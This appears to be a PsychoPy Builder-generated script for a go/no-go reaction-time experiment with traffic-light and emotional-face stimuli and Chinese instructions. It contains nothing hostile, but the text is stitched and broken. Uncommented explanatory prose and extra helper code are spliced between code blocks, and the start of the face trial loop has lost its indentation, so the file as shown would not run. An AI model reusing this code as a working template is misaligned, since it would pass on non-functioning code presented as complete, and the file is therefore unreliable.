    text='现在,测试第二种类型\n\n在每个表情图片出现时\n如果为快乐或者中性,请按下空格键\n如果为悲伤,请不要按键\n\n(继续,请按空格键)\n',
    font='Arial',
    pos=(0, 0), height=0.05, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR',
    depth=0.0);
key_resp_7 = keyboard.Keyboard()
# Initialize components for Routine "face"
faceClock = core.Clock()
concentration2 = visual.TextStim(win=win, name='concentration2',
    text='+',
    font='Arial',
    pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR',
    depth=0.0);
image_2 = visual.ImageStim(
    win=win,
    name='image_2',
    image='sin', mask=None,
    ori=0, pos=(0, 0), size=(0.4, 0.5),
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=-1.0)
key_resp_face = keyboard.Keyboard()
# Initialize components for Routine "thanks"
thanksClock = core.Clock()
# text: "The test is over. Thank you for participating."
text = visual.TextStim(win=win, name='text',
    text='测试结束,谢谢您的参与',
    font='Arial',
    pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR',
    depth=0.0);
# Create some handy timers
globalClock = core.Clock() # to track the time since experiment started
routineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine
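The instruction and tip routines that follow all expand the same Builder-generated prepare/run/end pattern: draw a text stimulus every frame until the space key arrives. A minimal, framework-agnostic sketch of that loop structure follows; the function and its callable parameters are illustrative, not part of the generated script:

```python
def run_until_response(draw_frame, get_keys, max_frames=None):
    """Sketch of the Builder routine loop: draw each frame until a key arrives.

    draw_frame -- callable that renders one frame (e.g. stim.draw(); win.flip())
    get_keys   -- callable returning the list of keys pressed so far
    max_frames -- optional frame budget, mirroring timed routines like "light"
    """
    frame_n = 0
    while max_frames is None or frame_n < max_frames:
        keys = get_keys()
        if keys:          # a response ends the routine
            return keys
        draw_frame()      # otherwise refresh the screen
        frame_n += 1
    return []             # routine timed out with no response
```

In the generated code the same logic is inlined per routine, with `win.flip()` driving the frame loop and `keyboard.Keyboard.getKeys()` supplying the responses.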
# ------Prepare to start Routine "introduction1"-------
continueRoutine = True
# update component parameters for each repeat
key_resp.keys = []
key_resp.rt = []
_key_resp_allKeys = []
# keep track of which components have finished
introduction1Components = [introduction_1, key_resp]
for thisComponent in introduction1Components:
    thisComponent.tStart = None
    thisComponent.tStop = None
    thisComponent.tStartRefresh = None
    thisComponent.tStopRefresh = None
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
introduction1Clock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "introduction1"-------
while continueRoutine:
    # get current time
    t = introduction1Clock.getTime()
    tThisFlip = win.getFutureFlipTime(clock=introduction1Clock)
    tThisFlipGlobal = win.getFutureFlipTime(clock=None)
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # update/draw components on each frame

    # *introduction_1* updates
    if introduction_1.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
        # keep track of start time/frame for later
        introduction_1.frameNStart = frameN  # exact frame index
        introduction_1.tStart = t  # local t and not account for scr refresh
        introduction_1.tStartRefresh = tThisFlipGlobal  # on global time
        win.timeOnFlip(introduction_1, 'tStartRefresh')  # time at next scr refresh
        introduction_1.setAutoDraw(True)

    # *key_resp* updates
    waitOnFlip = False
    if key_resp.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
        # keep track of start time/frame for later
        key_resp.frameNStart = frameN  # exact frame index
        key_resp.tStart = t  # local t and not account for scr refresh
        key_resp.tStartRefresh = tThisFlipGlobal  # on global time
        win.timeOnFlip(key_resp, 'tStartRefresh')  # time at next scr refresh
        key_resp.status = STARTED
        # keyboard checking is just starting
        waitOnFlip = True
        win.callOnFlip(key_resp.clock.reset)  # t=0 on next screen flip
        win.callOnFlip(key_resp.clearEvents, eventType='keyboard')  # clear events on next screen flip
    if key_resp.status == STARTED and not waitOnFlip:
        theseKeys = key_resp.getKeys(keyList=['space'], waitRelease=False)
        _key_resp_allKeys.extend(theseKeys)
        if len(_key_resp_allKeys):
            key_resp.keys = _key_resp_allKeys[-1].name  # just the last key pressed
            key_resp.rt = _key_resp_allKeys[-1].rt
            # a response ends the routine
            continueRoutine = False

    # check for quit (typically the Esc key)
    if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
        core.quit()

    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in introduction1Components:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished

    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()
# -------Ending Routine "introduction1"-------
for thisComponent in introduction1Components:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
thisExp.addData('introduction_1.started', introduction_1.tStartRefresh)
thisExp.addData('introduction_1.stopped', introduction_1.tStopRefresh)
# the Routine "introduction1" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "introduction4"-------
continueRoutine = True
# update component parameters for each repeat
key_resp_4.keys = []
key_resp_4.rt = []
_key_resp_4_allKeys = []
# keep track of which components have finished
introduction4Components = [introduction_4, key_resp_4]
for thisComponent in introduction4Components:
    thisComponent.tStart = None
    thisComponent.tStop = None
    thisComponent.tStartRefresh = None
    thisComponent.tStopRefresh = None
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
introduction4Clock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "introduction4"-------
while continueRoutine:
    # get current time
    t = introduction4Clock.getTime()
    tThisFlip = win.getFutureFlipTime(clock=introduction4Clock)
    tThisFlipGlobal = win.getFutureFlipTime(clock=None)
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # update/draw components on each frame

    # *introduction_4* updates
    if introduction_4.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
        # keep track of start time/frame for later
        introduction_4.frameNStart = frameN  # exact frame index
        introduction_4.tStart = t  # local t and not account for scr refresh
        introduction_4.tStartRefresh = tThisFlipGlobal  # on global time
        win.timeOnFlip(introduction_4, 'tStartRefresh')  # time at next scr refresh
        introduction_4.setAutoDraw(True)

    # *key_resp_4* updates
    waitOnFlip = False
    if key_resp_4.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
        # keep track of start time/frame for later
        key_resp_4.frameNStart = frameN  # exact frame index
        key_resp_4.tStart = t  # local t and not account for scr refresh
        key_resp_4.tStartRefresh = tThisFlipGlobal  # on global time
        win.timeOnFlip(key_resp_4, 'tStartRefresh')  # time at next scr refresh
        key_resp_4.status = STARTED
        # keyboard checking is just starting
        waitOnFlip = True
        win.callOnFlip(key_resp_4.clock.reset)  # t=0 on next screen flip
        win.callOnFlip(key_resp_4.clearEvents, eventType='keyboard')  # clear events on next screen flip
    if key_resp_4.status == STARTED and not waitOnFlip:
        theseKeys = key_resp_4.getKeys(keyList=['space'], waitRelease=False)
        _key_resp_4_allKeys.extend(theseKeys)
        if len(_key_resp_4_allKeys):
            key_resp_4.keys = _key_resp_4_allKeys[-1].name  # just the last key pressed
            key_resp_4.rt = _key_resp_4_allKeys[-1].rt
            # a response ends the routine
            continueRoutine = False

    # check for quit (typically the Esc key)
    if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
        core.quit()

    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in introduction4Components:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished

    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()
# -------Ending Routine "introduction4"-------
for thisComponent in introduction4Components:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
thisExp.addData('introduction_4.started', introduction_4.tStartRefresh)
thisExp.addData('introduction_4.stopped', introduction_4.tStopRefresh)
# the Routine "introduction4" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "introduction2"-------
continueRoutine = True
# update component parameters for each repeat
key_resp_2.keys = []
key_resp_2.rt = []
_key_resp_2_allKeys = []
# keep track of which components have finished
introduction2Components = [introduction_2, key_resp_2]
for thisComponent in introduction2Components:
    thisComponent.tStart = None
    thisComponent.tStop = None
    thisComponent.tStartRefresh = None
    thisComponent.tStopRefresh = None
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
introduction2Clock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "introduction2"-------
while continueRoutine:
    # get current time
    t = introduction2Clock.getTime()
    tThisFlip = win.getFutureFlipTime(clock=introduction2Clock)
    tThisFlipGlobal = win.getFutureFlipTime(clock=None)
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # update/draw components on each frame

    # *introduction_2* updates
    if introduction_2.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
        # keep track of start time/frame for later
        introduction_2.frameNStart = frameN  # exact frame index
        introduction_2.tStart = t  # local t and not account for scr refresh
        introduction_2.tStartRefresh = tThisFlipGlobal  # on global time
        win.timeOnFlip(introduction_2, 'tStartRefresh')  # time at next scr refresh
        introduction_2.setAutoDraw(True)

    # *key_resp_2* updates
    waitOnFlip = False
    if key_resp_2.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
        # keep track of start time/frame for later
        key_resp_2.frameNStart = frameN  # exact frame index
        key_resp_2.tStart = t  # local t and not account for scr refresh
        key_resp_2.tStartRefresh = tThisFlipGlobal  # on global time
        win.timeOnFlip(key_resp_2, 'tStartRefresh')  # time at next scr refresh
        key_resp_2.status = STARTED
        # keyboard checking is just starting
        waitOnFlip = True
        win.callOnFlip(key_resp_2.clock.reset)  # t=0 on next screen flip
        win.callOnFlip(key_resp_2.clearEvents, eventType='keyboard')  # clear events on next screen flip
    if key_resp_2.status == STARTED and not waitOnFlip:
        theseKeys = key_resp_2.getKeys(keyList=['space'], waitRelease=False)
        _key_resp_2_allKeys.extend(theseKeys)
        if len(_key_resp_2_allKeys):
            key_resp_2.keys = _key_resp_2_allKeys[-1].name  # just the last key pressed
            key_resp_2.rt = _key_resp_2_allKeys[-1].rt
            # a response ends the routine
            continueRoutine = False

    # check for quit (typically the Esc key)
    if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
        core.quit()

    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in introduction2Components:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished

    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()
# -------Ending Routine "introduction2"-------
for thisComponent in introduction2Components:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
thisExp.addData('introduction_2.started', introduction_2.tStartRefresh)
thisExp.addData('introduction_2.stopped', introduction_2.tStopRefresh)
# the Routine "introduction2" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
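The conditions file `documents\light.xlsx` is not included in this chunk, so its exact contents are an assumption; judging from the variables the trial loop reads from it (`path1`, `path1_corr`), each row pairs a stimulus image path with the correct response (`'space'` for go trials, `None` for no-go). An equivalent inline `trialList`, with hypothetical file names, would look like:

```python
# Hypothetical stand-in for data.importConditions('documents\\light.xlsx'):
# each dict is one condition row; the column names match the variables used
# in the loop below.
example_light_conditions = [
    {'path1': 'documents/green_light.png', 'path1_corr': 'space'},   # go
    {'path1': 'documents/yellow_light.png', 'path1_corr': 'space'},  # go
    {'path1': 'documents/red_light.png', 'path1_corr': None},        # no-go
]
```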
# set up handler to look after randomisation of conditions etc
loop_light1 = data.TrialHandler(nReps=12, method='random',
    extraInfo=expInfo, originPath=-1,
    trialList=data.importConditions('documents\\light.xlsx'),
    seed=None, name='loop_light1')
thisExp.addLoop(loop_light1) # add the loop to the experiment
thisLoop_light1 = loop_light1.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisLoop_light1.rgb)
if thisLoop_light1 != None:
    for paramName in thisLoop_light1:
        exec('{} = thisLoop_light1[paramName]'.format(paramName))
for thisLoop_light1 in loop_light1:
    currentLoop = loop_light1
    # abbreviate parameter names if possible (e.g. rgb = thisLoop_light1.rgb)
    if thisLoop_light1 != None:
        for paramName in thisLoop_light1:
            exec('{} = thisLoop_light1[paramName]'.format(paramName))

    # ------Prepare to start Routine "light"-------
    continueRoutine = True
    routineTimer.add(2.400000)
    # update component parameters for each repeat
    image.setImage(path1)
    key_resp_light.keys = []
    key_resp_light.rt = []
    _key_resp_light_allKeys = []
    # keep track of which components have finished
    lightComponents = [concentration, image, key_resp_light]
    for thisComponent in lightComponents:
        thisComponent.tStart = None
        thisComponent.tStop = None
        thisComponent.tStartRefresh = None
        thisComponent.tStopRefresh = None
        if hasattr(thisComponent, 'status'):
            thisComponent.status = NOT_STARTED
    # reset timers
    t = 0
    _timeToFirstFrame = win.getFutureFlipTime(clock="now")
    lightClock.reset(-_timeToFirstFrame)  # t0 is time of first possible flip
    frameN = -1

    # -------Run Routine "light"-------
    while continueRoutine and routineTimer.getTime() > 0:
        # get current time
        t = lightClock.getTime()
        tThisFlip = win.getFutureFlipTime(clock=lightClock)
        tThisFlipGlobal = win.getFutureFlipTime(clock=None)
        frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
        # update/draw components on each frame

        # *concentration* updates
        if concentration.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
            # keep track of start time/frame for later
            concentration.frameNStart = frameN  # exact frame index
            concentration.tStart = t  # local t and not account for scr refresh
            concentration.tStartRefresh = tThisFlipGlobal  # on global time
            win.timeOnFlip(concentration, 'tStartRefresh')  # time at next scr refresh
            concentration.setAutoDraw(True)
        if concentration.status == STARTED:
            # is it time to stop? (based on global clock, using actual start)
            if tThisFlipGlobal > concentration.tStartRefresh + 0.4-frameTolerance:
                # keep track of stop time/frame for later
                concentration.tStop = t  # not accounting for scr refresh
                concentration.frameNStop = frameN  # exact frame index
                win.timeOnFlip(concentration, 'tStopRefresh')  # time at next scr refresh
                concentration.setAutoDraw(False)

        # *image* updates
        if image.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
            # keep track of start time/frame for later
            image.frameNStart = frameN  # exact frame index
            image.tStart = t  # local t and not account for scr refresh
            image.tStartRefresh = tThisFlipGlobal  # on global time
            win.timeOnFlip(image, 'tStartRefresh')  # time at next scr refresh
            image.setAutoDraw(True)
        if image.status == STARTED:
            # is it time to stop? (based on global clock, using actual start)
            if tThisFlipGlobal > image.tStartRefresh + 2-frameTolerance:
                # keep track of stop time/frame for later
                image.tStop = t  # not accounting for scr refresh
                image.frameNStop = frameN  # exact frame index
                win.timeOnFlip(image, 'tStopRefresh')  # time at next scr refresh
                image.setAutoDraw(False)

        # *key_resp_light* updates
        waitOnFlip = False
        if key_resp_light.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
            # keep track of start time/frame for later
            key_resp_light.frameNStart = frameN  # exact frame index
            key_resp_light.tStart = t  # local t and not account for scr refresh
            key_resp_light.tStartRefresh = tThisFlipGlobal  # on global time
            win.timeOnFlip(key_resp_light, 'tStartRefresh')  # time at next scr refresh
            key_resp_light.status = STARTED
            # keyboard checking is just starting
            waitOnFlip = True
            win.callOnFlip(key_resp_light.clock.reset)  # t=0 on next screen flip
            win.callOnFlip(key_resp_light.clearEvents, eventType='keyboard')  # clear events on next screen flip
        if key_resp_light.status == STARTED:
            # is it time to stop? (based on global clock, using actual start)
            if tThisFlipGlobal > key_resp_light.tStartRefresh + 2-frameTolerance:
                # keep track of stop time/frame for later
                key_resp_light.tStop = t  # not accounting for scr refresh
                key_resp_light.frameNStop = frameN  # exact frame index
                win.timeOnFlip(key_resp_light, 'tStopRefresh')  # time at next scr refresh
                key_resp_light.status = FINISHED
        if key_resp_light.status == STARTED and not waitOnFlip:
            theseKeys = key_resp_light.getKeys(keyList=['space'], waitRelease=False)
            _key_resp_light_allKeys.extend(theseKeys)
            if len(_key_resp_light_allKeys):
                key_resp_light.keys = _key_resp_light_allKeys[-1].name  # just the last key pressed
                key_resp_light.rt = _key_resp_light_allKeys[-1].rt
                # was this correct?
                if (key_resp_light.keys == str(path1_corr)) or (key_resp_light.keys == path1_corr):
                    key_resp_light.corr = 1
                else:
                    key_resp_light.corr = 0
                # a response ends the routine
                continueRoutine = False

        # check for quit (typically the Esc key)
        if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
            core.quit()

        # check if all components have finished
        if not continueRoutine:  # a component has requested a forced-end of Routine
            break
        continueRoutine = False  # will revert to True if at least one component still running
        for thisComponent in lightComponents:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break  # at least one component has not yet finished

        # refresh the screen
        if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
            win.flip()

    # -------Ending Routine "light"-------
    for thisComponent in lightComponents:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    loop_light1.addData('concentration.started', concentration.tStartRefresh)
    loop_light1.addData('concentration.stopped', concentration.tStopRefresh)
    loop_light1.addData('image.started', image.tStartRefresh)
    loop_light1.addData('image.stopped', image.tStopRefresh)
    # check responses
    if key_resp_light.keys in ['', [], None]:  # No response was made
        key_resp_light.keys = None
        # was no response the correct answer?!
        if str(path1_corr).lower() == 'none':
            key_resp_light.corr = 1  # correct non-response
        else:
            key_resp_light.corr = 0  # failed to respond (incorrectly)
    # store data for loop_light1 (TrialHandler)
    loop_light1.addData('key_resp_light.keys', key_resp_light.keys)
    loop_light1.addData('key_resp_light.corr', key_resp_light.corr)
    if key_resp_light.keys != None:  # we had a response
        loop_light1.addData('key_resp_light.rt', key_resp_light.rt)
    loop_light1.addData('key_resp_light.started', key_resp_light.tStartRefresh)
    loop_light1.addData('key_resp_light.stopped', key_resp_light.tStopRefresh)
    thisExp.nextEntry()
# completed 12 repeats of 'loop_light1'
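Each trial above stores `key_resp_light.corr` and `key_resp_light.rt` through the TrialHandler, but the generated script never aggregates them. A post-hoc summary could be computed with a helper like this (a sketch, not part of the Builder output; the argument lists stand for the saved per-trial columns):

```python
def gonogo_summary(corr, rts):
    """Return (accuracy, mean RT over responded trials) from per-trial data.

    corr -- list of 0/1 correctness flags, one per trial
    rts  -- list of reaction times, with None for trials without a response
    """
    accuracy = sum(corr) / len(corr) if corr else 0.0
    responded = [rt for rt in rts if rt is not None]
    mean_rt = sum(responded) / len(responded) if responded else None
    return accuracy, mean_rt
```

The same helper would apply unchanged to the `key_resp_face` data collected in the face loop below.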
# ------Prepare to start Routine "introduction3"-------
continueRoutine = True
# update component parameters for each repeat
key_resp_3.keys = []
key_resp_3.rt = []
_key_resp_3_allKeys = []
# keep track of which components have finished
introduction3Components = [introduction_3, key_resp_3]
for thisComponent in introduction3Components:
    thisComponent.tStart = None
    thisComponent.tStop = None
    thisComponent.tStartRefresh = None
    thisComponent.tStopRefresh = None
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
introduction3Clock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "introduction3"-------
while continueRoutine:
    # get current time
    t = introduction3Clock.getTime()
    tThisFlip = win.getFutureFlipTime(clock=introduction3Clock)
    tThisFlipGlobal = win.getFutureFlipTime(clock=None)
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # update/draw components on each frame

    # *introduction_3* updates
    if introduction_3.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
        # keep track of start time/frame for later
        introduction_3.frameNStart = frameN  # exact frame index
        introduction_3.tStart = t  # local t and not account for scr refresh
        introduction_3.tStartRefresh = tThisFlipGlobal  # on global time
        win.timeOnFlip(introduction_3, 'tStartRefresh')  # time at next scr refresh
        introduction_3.setAutoDraw(True)

    # *key_resp_3* updates
    waitOnFlip = False
    if key_resp_3.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
        # keep track of start time/frame for later
        key_resp_3.frameNStart = frameN  # exact frame index
        key_resp_3.tStart = t  # local t and not account for scr refresh
        key_resp_3.tStartRefresh = tThisFlipGlobal  # on global time
        win.timeOnFlip(key_resp_3, 'tStartRefresh')  # time at next scr refresh
        key_resp_3.status = STARTED
        # keyboard checking is just starting
        waitOnFlip = True
        win.callOnFlip(key_resp_3.clock.reset)  # t=0 on next screen flip
        win.callOnFlip(key_resp_3.clearEvents, eventType='keyboard')  # clear events on next screen flip
    if key_resp_3.status == STARTED and not waitOnFlip:
        theseKeys = key_resp_3.getKeys(keyList=['space'], waitRelease=False)
        _key_resp_3_allKeys.extend(theseKeys)
        if len(_key_resp_3_allKeys):
            key_resp_3.keys = _key_resp_3_allKeys[-1].name  # just the last key pressed
            key_resp_3.rt = _key_resp_3_allKeys[-1].rt
            # a response ends the routine
            continueRoutine = False

    # check for quit (typically the Esc key)
    if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
        core.quit()

    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in introduction3Components:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished

    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()
# -------Ending Routine "introduction3"-------
for thisComponent in introduction3Components:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
thisExp.addData('introduction_3.started', introduction_3.tStartRefresh)
thisExp.addData('introduction_3.stopped', introduction_3.tStopRefresh)
# the Routine "introduction3" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
loop_face1 = data.TrialHandler(nReps=2, method='random',
    extraInfo=expInfo, originPath=-1,
    trialList=data.importConditions('documents\\face.xlsx'),
    seed=None, name='loop_face1')
thisExp.addLoop(loop_face1) # add the loop to the experiment
thisLoop_face1 = loop_face1.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisLoop_face1.rgb)
if thisLoop_face1 != None:
    for paramName in thisLoop_face1:
        exec('{} = thisLoop_face1[paramName]'.format(paramName))
for thisLoop_face1 in loop_face1:
currentLoop = loop_face1
# abbreviate parameter names if possible (e.g. rgb = thisLoop_face1.rgb)
if thisLoop_face1 != None:
for paramName in thisLoop_face1:
exec('{} = thisLoop_face1[paramName]'.format(paramName))
# ------Prepare to start Routine "face"-------
continueRoutine = True
routineTimer.add(2.400000)
# update component parameters for each repeat
image_2.setImage(path2)
key_resp_face.keys = []
key_resp_face.rt = []
_key_resp_face_allKeys = []
# keep track of which components have finished
faceComponents = [concentration2, image_2, key_resp_face]
for thisComponent in faceComponents:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
faceClock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "face"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = faceClock.getTime()
tThisFlip = win.getFutureFlipTime(clock=faceClock)
tThisFlipGlobal = win.getFutureFlipTime(clock=None)
        frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
        # update/draw components on each frame

        # *concentration2* updates
        if concentration2.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
            # keep track of start time/frame for later
            concentration2.frameNStart = frameN  # exact frame index
            concentration2.tStart = t  # local t and not account for scr refresh
            concentration2.tStartRefresh = tThisFlipGlobal  # on global time
            win.timeOnFlip(concentration2, 'tStartRefresh')  # time at next scr refresh
            concentration2.setAutoDraw(True)
        if concentration2.status == STARTED:
            # is it time to stop? (based on global clock, using actual start)
            if tThisFlipGlobal > concentration2.tStartRefresh + 0.4-frameTolerance:
                # keep track of stop time/frame for later
                concentration2.tStop = t  # not accounting for scr refresh
                concentration2.frameNStop = frameN  # exact frame index
                win.timeOnFlip(concentration2, 'tStopRefresh')  # time at next scr refresh
                concentration2.setAutoDraw(False)

        # *image_2* updates
        if image_2.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
            # keep track of start time/frame for later
            image_2.frameNStart = frameN  # exact frame index
            image_2.tStart = t  # local t and not account for scr refresh
            image_2.tStartRefresh = tThisFlipGlobal  # on global time
            win.timeOnFlip(image_2, 'tStartRefresh')  # time at next scr refresh
            image_2.setAutoDraw(True)
        if image_2.status == STARTED:
            # is it time to stop? (based on global clock, using actual start)
            if tThisFlipGlobal > image_2.tStartRefresh + 2-frameTolerance:
                # keep track of stop time/frame for later
                image_2.tStop = t  # not accounting for scr refresh
                image_2.frameNStop = frameN  # exact frame index
                win.timeOnFlip(image_2, 'tStopRefresh')  # time at next scr refresh
                image_2.setAutoDraw(False)

        # *key_resp_face* updates
        waitOnFlip = False
        if key_resp_face.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
            # keep track of start time/frame for later
            key_resp_face.frameNStart = frameN  # exact frame index
            key_resp_face.tStart = t  # local t and not account for scr refresh
            key_resp_face.tStartRefresh = tThisFlipGlobal  # on global time
            win.timeOnFlip(key_resp_face, 'tStartRefresh')  # time at next scr refresh
            key_resp_face.status = STARTED
            # keyboard checking is just starting
            waitOnFlip = True
            win.callOnFlip(key_resp_face.clock.reset)  # t=0 on next screen flip
            win.callOnFlip(key_resp_face.clearEvents, eventType='keyboard')  # clear events on next screen flip
        if key_resp_face.status == STARTED:
            # is it time to stop? (based on global clock, using actual start)
            if tThisFlipGlobal > key_resp_face.tStartRefresh + 2-frameTolerance:
                # keep track of stop time/frame for later
                key_resp_face.tStop = t  # not accounting for scr refresh
                key_resp_face.frameNStop = frameN  # exact frame index
                win.timeOnFlip(key_resp_face, 'tStopRefresh')  # time at next scr refresh
                key_resp_face.status = FINISHED
        if key_resp_face.status == STARTED and not waitOnFlip:
            theseKeys = key_resp_face.getKeys(keyList=['space'], waitRelease=False)
            _key_resp_face_allKeys.extend(theseKeys)
            if len(_key_resp_face_allKeys):
                key_resp_face.keys = _key_resp_face_allKeys[-1].name  # just the last key pressed
                key_resp_face.rt = _key_resp_face_allKeys[-1].rt
                # was this correct?
                if (key_resp_face.keys == str(path2_corr)) or (key_resp_face.keys == path2_corr):
                    key_resp_face.corr = 1
                else:
                    key_resp_face.corr = 0
                # a response ends the routine
                continueRoutine = False

        # check for quit (typically the Esc key)
        if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
            core.quit()

        # check if all components have finished
        if not continueRoutine:  # a component has requested a forced-end of Routine
            break
        continueRoutine = False  # will revert to True if at least one component still running
        for thisComponent in faceComponents:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break  # at least one component has not yet finished

        # refresh the screen
        if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
            win.flip()
    # -------Ending Routine "face"-------
    for thisComponent in faceComponents:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    loop_face1.addData('concentration2.started', concentration2.tStartRefresh)
    loop_face1.addData('concentration2.stopped', concentration2.tStopRefresh)
    loop_face1.addData('image_2.started', image_2.tStartRefresh)
    loop_face1.addData('image_2.stopped', image_2.tStopRefresh)
    # check responses
    if key_resp_face.keys in ['', [], None]:  # No response was made
        key_resp_face.keys = None
        # was no response the correct answer?!
        if str(path2_corr).lower() == 'none':
            key_resp_face.corr = 1  # correct non-response
        else:
            key_resp_face.corr = 0  # failed to respond (incorrectly)
    # store data for loop_face1 (TrialHandler)
    loop_face1.addData('key_resp_face.keys', key_resp_face.keys)
    loop_face1.addData('key_resp_face.corr', key_resp_face.corr)
    if key_resp_face.keys != None:  # we had a response
        loop_face1.addData('key_resp_face.rt', key_resp_face.rt)
    loop_face1.addData('key_resp_face.started', key_resp_face.tStartRefresh)
    loop_face1.addData('key_resp_face.stopped', key_resp_face.tStopRefresh)
    thisExp.nextEntry()

# completed 2 repeats of 'loop_face1'
# ------Prepare to start Routine "tip1"-------
continueRoutine = True
# update component parameters for each repeat
key_resp_5.keys = []
key_resp_5.rt = []
_key_resp_5_allKeys = []
# keep track of which components have finished
tip1Components = [tip_1, key_resp_5]
for thisComponent in tip1Components:
    thisComponent.tStart = None
    thisComponent.tStop = None
    thisComponent.tStartRefresh = None
    thisComponent.tStopRefresh = None
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
tip1Clock.reset(-_timeToFirstFrame)  # t0 is time of first possible flip
frameN = -1
# -------Run Routine "tip1"-------
while continueRoutine:
    # get current time
    t = tip1Clock.getTime()
    tThisFlip = win.getFutureFlipTime(clock=tip1Clock)
    tThisFlipGlobal = win.getFutureFlipTime(clock=None)
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # update/draw components on each frame

    # *tip_1* updates
